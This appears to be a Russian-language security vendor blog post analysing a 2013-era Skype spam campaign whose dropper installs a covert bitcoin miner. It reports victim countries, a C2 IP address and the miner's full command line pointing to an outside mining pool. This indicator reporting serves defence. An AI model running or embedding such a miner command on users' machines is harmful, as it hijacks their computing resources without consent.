Инциденты

Skype-магеддон ради добычи биткоинов

Cразу после публикации моего предыдущего поста  о вредоносных атаках на пользователей Skype знакомая из Венесуэлы прислала мне скриншот своего Skype-клиента с аналогичной (с точки зрения распространения) кампанией, отличающейся, однако, своими целями и происхождением. Вот оригинальный скриншот:

(Перевод с испанского: «это моя любимая фотография с тобой«)

Эта кампания началась 4-го апреля и разворачивалась на наших глазах:

В среднем, количество кликов достаточно высоко – более 2 тысяч в час.  Большинство потенциальных жертв живут в Италии, за которой следует Россия, Польша, Коста-Рика, Испания, Германия, Украина и другие страны.

Исходный дроппер загружается с сервера в Индии. Уровень детектирования на VirusTotal невысок. После заражения компьютера дроппер загружает в систему множество других вредоносных программ, причем загрузки осуществляются с сервиса Hotfile.com. В то же время, зловред осуществляет соединение с сервером C2, расположенным в Германии.

IP-адрес командного C2 сервера — 213.165.68.138:9000

Итак, что же делает зловред? Честно говоря, много чего, но самое интересное – то, что он превращает зараженный компьютер в генератор биткойнов. В результате значительно возрастает загрузка процессора, например:

Вышеупомянутый процесс запускается командой ?bitcoin-miner.exe
-a 60 -l no -o http://suppp.cantvenlinea.biz:1942/ -u
XXXXXX0000001@gmail.com -p XXXXXXXX
│ (конфиденциальные данные были заменены на XXXXXX). Он использует процессор зараженного компьютера без ведома пользователя, добывая биткойны для киберпреступников.

Как я уже упомянул, кампания проходит достаточно активно. Если вы видите, что ваш компьютер работает, задействуя все ресурсы процессора, это может говорить о заражении.

Исходный дроппер детектируется «Лабораторией Касперского» как Trojan.Win32.Jorik.IRCbot.xkt.

Skype-магеддон ради добычи биткоинов

Ваш e-mail не будет опубликован. Обязательные поля помечены *

 

Отчеты

CloudSorcerer: новая APT-угроза, нацеленная на российские государственные организации

«Лаборатория Касперского» обнаружила новую APT-угрозу CloudSorcerer, нацеленную на российские государственные организации и использующую облачные службы в качестве командных серверов аналогично APT CloudWizard.

StripedFly: двуликий и незаметный

Разбираем фреймворк StripedFly для целевых атак, использовавший собственную версию эксплойта EternalBlue и успешно прикрывавшийся майнером.

Подпишитесь на еженедельную рассылку

Самая актуальная аналитика – в вашем почтовом ящике